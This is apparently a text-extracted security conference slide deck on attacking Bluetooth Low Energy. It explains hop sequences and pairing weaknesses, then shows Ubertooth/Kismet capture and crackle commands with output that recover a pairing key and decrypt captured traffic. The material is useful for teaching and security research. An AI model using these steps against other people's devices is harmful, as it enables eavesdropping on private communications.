View
56
Download
2
Embed Size (px)
Citation preview
#whoami
Jiggyasu Sharma
• A secuirty N00b• I hack for bread and b33r• I write [crape]• I shoot [by camera]
Bluetooth
• Bluetooth is a wireless technology standard for exchanging data over short distances (using short-wavelength UHF radio waves in the ISM band from 2.4 to 2.485 GHz) from fixed and mobile devices, and building personal area networks (PANs). (wiki)
History
• Named on 10th century king Herald Bluetooth• Proposed by Jim Kardach• In 1997• A system which communicate b/w phone and comp• BSIG
Capability
• Wireless• Short Range• Less energy• Cheap• Personal• Easy• Multipoint• Frequency hopping• [in]secure
Where is being used
• Phone/Computer/Camera/Speaker• Watch/Fitness Band/Car/door locks• Cooker/coffee machine/trimer/dryer• Medical devices : ventilator/blood glucose monitor• Payment solution• 7 Million Devices
Difference
• Both can not communicate to each other• PHY and DLL are completely difference• High level protocol reuse [L2CAP…]
Hoping
• Hope along 37 data channels• One data packet per channel• Next channel = (channel + hop increment) mod 37
• 3 → 10 → 17 → 24 → 31 → 1 → 8 → 15 → …• hop increment = 7
Capturing Packates
• Configure CC2400• Follow connections according to hop pattern• Hand off bits to ARM MCU
Key Exchange Protocol
• Three stage process• 3 pairing methods• Just Works• 6-digit PIN• OOB
• “None of the pairing methods provide protection against a passive eavesdropper” -Bluetooth Core Spec
Required setup
• Bluetooth pairing devices (BLE/BTLE capable)• Ubertooth One• Linux system (Ubuntu/Kali works well)• Ubertooth config• Kismet• Wireshark• Crackle
Install ubertooth tools
• ubertooth basic functionality for spectrum analyzing, bluetooth sniffing and firmware updates
Ubertooth Spectrum Analyzing (before Kismet)• Connect the ubertooth one to your USB port• If you are using a virtual machine, enable it on the Devices/Usb Ports and seek the ubertooth one• Two green LEDs (RST and 1.8V) and the red LED (USB LED) that indicates Ubertooth can communicate via USB port.
install wireshark with wireshark bluetooth baseband plugin for the file captured by kismet to be analyzed.
Handle pcap file to crackleisaias@ubuntu:~/crackle-sample# crackle -i ltk_exchange.pcap -o decrypted.pcapTK found: 000000ding ding ding, using a TK of 0! Just Cracks(tm)Warning: packet is too short to be encrypted (1), skippingLTK found: 7f62c053f104a5bbe68b1d896a2ed49cDone, processed 712 total packets, decrypted 3
To listen in on future communications between the two devices : using LTK captured
isaias@ubuntu:~/crackle-sample# crackle -i encrypted_known_ltk.pcap -o decrypted2.pcap -l 7f62c053f104a5bbe68b1d896a2ed49cWarning: packet is too short to be encrypted (1), skippingWarning: packet is too short to be encrypted (2), skippingWarning: could not decrypt packet! Copying as is..Warning: could not decrypt packet! Copying as is..Warning: could not decrypt packet! Copying as is..Warning: invalid packet (length to long), skippingDone, processed 297 total packets, decrypted 7
References
• http://ubertooth.sourceforge.net/ • https://github.com/greatscottgadgets/ubertooth/ • https://www.kismetwireless.net/ • http://tools.kali.org/wireless-attacks/crackle • http://www.nist.gov/customcf/get_pdf.cfm?pub_id=911133
Thank you all, and Special thanks to…• Philips and team• Minatee Mishra• Anirudh Duggal• Sanjog Panda• Pardhiv Reddy• Ajay Pratap Singh• Geethu Arvind